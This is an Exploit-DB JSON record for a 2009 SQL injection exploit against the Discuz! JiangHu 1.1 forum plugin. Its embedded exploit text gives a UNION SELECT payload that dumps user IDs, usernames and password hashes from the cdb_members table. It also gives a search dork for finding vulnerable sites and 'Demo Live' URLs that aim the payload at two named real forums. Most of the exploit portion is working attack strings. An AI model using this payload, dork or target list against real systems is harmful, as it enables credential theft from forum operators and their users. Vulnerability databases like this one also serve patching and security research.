{"id": "EDB-ID:9576", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Discuz! Plugin JiangHu 1.1 - 'id' SQL Injection", "description": "", "published": "2009-09-02T00:00:00", "modified": "2009-09-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/9576", "reporter": "ZhaoHuAn", "references": [], "cvelist": ["2009-4621"], "immutableFields": [], "lastseen": "2022-01-13T06:59:48", "viewCount": 19, "enchantments": {"dependencies": {}, "score": {"value": 0.7, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.7}, "sourceHref": "https://www.exploit-db.com/download/9576", "sourceData": "=========================================================\r\nDiscuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability\r\n=========================================================\r\n\r\n========================[Author]========================= \r\n\r\n [+] Founded \t: ZhaoHuAn\t\t\t\t \r\n [+] Contact\t: ZhengXing[at]shandagames[dot]com\t \r\n [+] Blog\t: http://www.patching.net/zhaohuan/\t \r\n [+] Date\t: Feb, 9th 2009\t \r\n [+] Update\t: Sep, 1th 2009\t\r\n\t\t\t\t\t\t\t\t \r\n========================[Soft Info]======================\t\t \r\n\t\t\t\t\t\t\t\t \r\nSoftware: Discuz! Plugin JiangHu Inn\t\t \r\nVersion\t: 1.1\t\t\t\t\t \r\nVendor\t: http://www.discuz.com\r\nd0rk : inurl:forummission.php\t\t\t \t \r\n\r\n\r\n\r\n[-] Exploit:\r\n[+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--\r\n\r\n[-] SqlI PoC:\r\n[+] http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--\r\n\r\n[+] Demo Live:\r\n[-] http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--\r\n\r\n[-] http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--\r\n\r\n\r\n/---------------------------------------------www.zhaohuan.net-------------------------------------------------\\ \r\n\r\n Greetz : Snda Security Team\r\n & Normal is boring - -!\r\n\r\n\\--------------------------------------------------------------------------------------------------------------/\r\n\r\n# milw0rm.com [2009-09-02]", "osvdbidlist": ["61855"], "exploitType": "webapps", "verified": true, "_state": {"dependencies": 1645426381}}
{}
Discuz! Plugin JiangHu 1.1 - 'id' SQL Injection